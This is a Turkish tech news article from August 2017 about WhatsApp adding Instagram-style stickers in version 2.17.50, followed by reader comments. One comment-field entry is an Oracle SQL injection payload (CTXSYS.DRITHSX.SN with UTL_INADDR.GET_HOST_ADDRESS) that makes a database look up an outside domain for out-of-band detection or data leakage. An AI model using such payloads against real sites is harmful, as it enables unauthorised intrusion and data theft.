WhatsApp'a Çıkartma Özelliği Ekleniyor!

WhatsApp'ta Instagram'da olduğu gibi çıkrama kullanılabilecek. Çıkartmaları fotoğraf ve video paylaşır gibi paylaşabileceksiniz.
22 Ağustos 2017 11:47
WhatsAppa Çıkartma Özelliği Ekleniyor!
WhatsApp, Facebook’un eline geçtiğinden beri sadece mesajlaşma uygulaması olmaktan çıkarak kendisini çok geliştirdi. Görüntülü Arama gibi imkanlar sunan uygulama, bu imkanların dışında Snapchat ile hayatlarımıza girip Instagram’da popülerliğini iyiden iyiye artıran Hikayeler özelliğini getirmişti.
 
Instagram’da çok fazla tutulmasına rağmen WhatsApp’da pek kullanılmayan Hikayeler özelliğini daha çok harekete geçirmek isteyen Facebook, WhatsApp’a da Instagram’da olduğu gibi çıkartmalar ekliyor. Yeni çıkartmalar, bugün AppStore’da yayınlanan WhatsApp 2.17.50 sürümüyle birlikte ortaya çıktı. Daha önce, yalnızca iOS’daki metinleri ve emojileri eklemeye izin veren WhatsApp, bundan sonra yeni bir fotoğraf, video veya GIF paylaşırken, özel çıkartmalar paylaşmanıza olanak tanıyacak.
 
 
Bunlarla birlikte WhatsApp’ın yakında daha fazla çıkartmayı kullanıcılarına sunması bekleniyor. WhatsApp’ınızda ekli olan herkese hikayenizi paylaşmak için kullandığınız WhatsApp Durumum, bu sıralar çok az kişi tarafından kullanılıyor. Mesajlaşma uygulamalarından ziyade sosyal medya uygulamalarına daha yatkın olan Hikayeler sistemi, Facebook'un WhatsApp’ı da sosyal medya uygulamasına benzetmek için yaptığı bir proje olabilir.
 
webtekno
802805
'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('bikuxjpichcasr0qqkwozdw9-wo7j3qkvojqvl8m'||'roq.r87.me') from DUAL))||'
22 Ağustos 2017, Salı 13:48
Çok güzel ya. Her zaman geliştirsinler
Bu haberler ilginizi çekebilir